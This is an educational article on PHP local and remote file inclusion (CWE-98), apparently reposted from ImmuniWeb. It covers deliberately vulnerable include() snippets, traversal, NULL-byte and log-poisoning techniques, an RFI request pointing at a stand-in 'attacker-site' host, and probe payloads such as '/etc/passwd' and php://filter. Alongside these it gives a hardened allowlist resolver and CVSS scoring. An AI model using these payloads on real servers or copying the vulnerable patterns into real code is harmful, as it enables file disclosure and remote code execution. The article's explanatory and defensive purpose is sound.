PHP File Inclusion [CWE-98] — The Hacktivists
--
The PHP File Inclusion weakness describes improper control of the filename passed to include() or require() (and their _once variants) in a PHP program.
Table of Content
1. Description
2. Potential impact
3. Attack patterns
4. Affected software
5. Exploitation Examples
6. Severity and CVSS Scoring
1. Description
………………………………
This weakness occurs when a PHP application takes untrusted input and uses it, in whole or in part, to build the path passed to include(), require(), or similar functions. An attacker can then make the application include a file of their choosing, which may lead to information disclosure or execution of arbitrary code. Two types of inclusion are distinguished by where the included file lives: local and remote file inclusion.
❏ Local file inclusion: Local file inclusion occurs when the attacker cannot control the beginning of the path (the application prepends a fixed prefix) or when inclusion of remote URLs is disabled, so only files already present on the server can be included. The following example shows vulnerable PHP code that can be abused to include local files:
$filename = $_GET["filename"];   // untrusted, used as part of the path
include($_SERVER["DOCUMENT_ROOT"] . "/" . $filename . ".php");
In the above example, the prefix only fixes the starting directory, so a filename containing ../ sequences can reach an arbitrary file on the local system. include() outputs any non-PHP content of the included file verbatim, so plain text files (configuration files, /etc/passwd) are disclosed, and any PHP code in the file is executed. The attacker can therefore obtain code execution by first planting PHP code in a file the web server writes, such as an access or error log (log poisoning), and then including that log via directory traversal.
To get past the fixed ".php" suffix the attacker combines directory traversal with a NULL byte (%00), which terminated the path in PHP versions before 5.3.4. Where the NULL byte is filtered, the attacker can instead pad the path beyond the maximum path length of the underlying system (path truncation), which had the same effect on older PHP builds. Current PHP versions reject NULL bytes in include paths, so against a modern interpreter the attack is limited to files that actually end in .php unless some other trick defeats the suffix.
❏ Remote file inclusion: Remote file inclusion occurs when an attacker can control the first part of the filename or the entire filename. The following example demonstrates the vulnerability:
$dir = $_GET["path"];
include($dir . "/file.inc");
The value of $dir is not restricted in any way, so an attacker can point it at a remote server. The following request makes the application fetch and include http://attacker-site/file.inc:
vulnerable.php?path=http://attacker-site
The PHP code in file.inc, which the attacker controls, is then executed on the vulnerable server.
Remote file inclusion requires both allow_url_fopen and allow_url_include to be enabled in php.ini. allow_url_include has been Off by default since PHP 5.2, so on a stock configuration remote URLs are refused and this code remains exploitable only as a local file inclusion.
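The fix for both snippets above, as an added example that is not the article's own code: the client may send only a key into a server-side table, the table supplies the real file or directory name, and a realpath() containment check backs the table up. The directory layout, the page and module names, and the probe values in the self-test are assumptions made for this example; the resolver itself is the same for the "filename" parameter of the local inclusion example and the "path" parameter of the remote one.

```php
<?php
// Added example, not code from the original article: one resolver that fixes
// both vulnerable patterns shown above (the "filename" parameter of the local
// inclusion example and the "path" parameter of the remote one). Directory
// layout, page names and module names are assumed for illustration.
declare(strict_types=1);

// What the client may ask for, and what the server actually loads. The client
// never supplies a path, only a key into one of these tables.
const PAGE_FILES  = ['home' => 'home.php', 'contact' => 'contact.php'];
const MODULE_DIRS = ['blog' => 'modules/blog', 'shop' => 'modules/shop'];

/**
 * Map a client-supplied key to an absolute path below $baseDir, or return null.
 * Nothing the client sends is ever concatenated into the include() argument.
 */
function resolve_under(string $baseDir, array $allowed, string $key): ?string
{
    // NUL bytes: historically used to drop a fixed suffix such as ".php".
    if (strpos($key, "\0") !== false) {
        return null;
    }
    // Plain identifiers only: no "/", "..", ":" or URL scheme survives this.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $key)) {
        return null;
    }
    // Unknown keys are an error, not a filename to try.
    if (!array_key_exists($key, $allowed)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm we are still inside $baseDir,
    // so a mistake in the table (or a symlink) cannot escape either.
    $realBase = realpath($baseDir);
    $real     = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($realBase === false || $real === false) {
        return null;
    }
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// ---- self-test on a constructed scratch tree (run from the CLI: php resolve_demo.php) ----
$root = sys_get_temp_dir() . '/inc_demo_' . getmypid();
mkdir("$root/pages", 0700, true);
mkdir("$root/modules/blog", 0700, true);
file_put_contents("$root/pages/home.php", "<?php echo 'home page loaded', PHP_EOL;");
file_put_contents("$root/modules/blog/file.inc", "<?php echo 'blog module loaded', PHP_EOL;");

// Constructed probe values: one legitimate key and typical LFI/RFI payloads.
$probes = [
    'home',
    '../../../../etc/passwd',
    "../../var/log/apache2/access.log\0",
    'http://attacker-site',
    'php://filter/convert.base64-encode/resource=index',
];
foreach ($probes as $p) {
    $r = resolve_under("$root/pages", PAGE_FILES, $p);
    printf("%-52s => %s\n", addcslashes($p, "\0"), $r ?? 'REJECTED');
}

// Local inclusion, fixed: the key comes from the request, the path from the table.
$page = resolve_under("$root/pages", PAGE_FILES, $_GET['filename'] ?? 'home');
if ($page !== null) {
    include $page;
}
// Remote inclusion, fixed: the same resolver picks the directory, and
// allow_url_include=Off in php.ini (the default since PHP 5.2) backs it up.
$dir = resolve_under($root, MODULE_DIRS, $_GET['path'] ?? 'blog');
if ($dir !== null) {
    include $dir . '/file.inc';
}

// Remove the scratch tree.
foreach (["$root/pages/home.php", "$root/modules/blog/file.inc"] as $f) { unlink($f); }
foreach (["$root/pages", "$root/modules/blog", "$root/modules", $root] as $d) { rmdir($d); }
```

Only the key "home" resolves; every traversal, NULL-byte, URL and stream-wrapper probe is rejected before realpath() is even consulted. The containment check is deliberately kept even though the allowlist already makes it redundant: it costs one realpath() call and catches a misconfigured table entry or a symlink planted inside the pages directory. Keep allow_url_include=Off in php.ini regardless; the resolver should never be the only thing standing between a request parameter and include().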
2. Potential impact
………………………………
Successful exploitation of PHP file inclusion may result in information disclosure or compromise of the vulnerable system. A remote attacker can read local files and, where attacker-controlled content can be included, execute arbitrary code on the target system with the privileges of the web server process.
3. Attack patterns
………………………………
In the CAPEC database, this weakness is treated as:
❏ CAPEC-193: PHP Remote File Inclusion
❏ CAPEC-252: PHP Local File Inclusion
According to alternative threat classification from WASC, this weakness is partially covered in WASC-05 (Remote File Inclusion) and WASC-28 (Null Byte Injection).
4. Affected software
………………………………
Web applications written in PHP are potentially vulnerable to this weakness.
5. Exploitation Examples
………………………………
Let’s have a look at the HTB23084 security advisory (CVE-2012-1933).
This advisory describes remote file inclusion, which means that we first create a file containing PHP code (here, a call to phpinfo()) on a server we control:
We will try to include this file, as described in the advisory, and see what happens:
In the image above, we can see the output of the phpinfo() function. We can replace it with any PHP code, including a web shell, and execute it on the vulnerable server. Successful exploitation of this vulnerability will result in a complete system compromise.
6. Severity and CVSS Scoring
……………………………………..
This weakness potentially allows unauthorized code execution on a remote system. It should be scored with maximum confidentiality, integrity, and availability ratings.
In cases where remote file inclusion is possible, the CVSS score should be:
9.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H] — Critical severity.
When local file inclusion is possible, a malicious user can include a local file with attacker-controlled data (e.g., web server log file). It should be scored as:
8.1 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H] — High severity.
In cases where the inclusion of attacker-controlled data is impossible, it should be scored as:
7.5 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N] — High severity.
Credits: https://www.immuniweb.com/